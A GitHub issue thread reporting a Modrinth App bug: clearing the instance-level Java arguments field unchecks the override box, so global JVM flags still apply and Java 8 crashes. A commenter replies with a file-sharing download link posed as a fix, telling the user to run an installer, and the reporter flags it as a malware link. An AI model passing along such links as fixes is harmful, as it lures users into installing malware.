### ISSUE TITLE
Unable to override Java arguments with an empty field

### ISSUE THREAD

**Issue by Felix14-v2** [modrinth/code#2361]
### Please confirm the following.

- [X] I checked the [existing issues](https://github.com/modrinth/code/issues) for duplicate problems
- [X] I have ensured my Modrinth App installation is up to date

### Info
- Modrinth App 0.8.5
- Windows 11

### Description

I use global custom JVM arguments to tweak the Java garbage collector behavior in Java 16 and newer in all my instances, and those arguments are incompatible with Java 8. But since ancient Forge doesn't support modern Java, I'm forced to use Java 8 to launch older versions of the game. After trying to launch Minecraft with Java 8, the JVM crashes because of my global JVM flags, so I want to override them in a single instance with an empty flag list. But Modrinth resets the overrides checkbox if the field is empty:

https://github.com/user-attachments/assets/73da73d3-0c07-48e8-ad9f-e5358641a131

### Steps to reproduce

1. Set a custom global Java arguments
2. Create an instance
3. Go to the instance settings
4. Check the `Override global java arguments` checkbox and clear the arguments
5. Try to launch Minecraft
6. The JVM flags are still applied
7. After reloading the page you can ensure that the checkbox has become unchecked

### Expected behavior

After pressing the `Override global java arguments` the empty field should remain empty and send no custom JVM flags during the launch process.

### Additional context

#526 is a feature request to solve the same problem, but I decided to open a bug report because the already implemented feature is not working as expected.

**Comment by blade2005** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by Felix14-v2** [comment]
> try this
\<malware link>
select the desired compiler in the installer

@Minenash
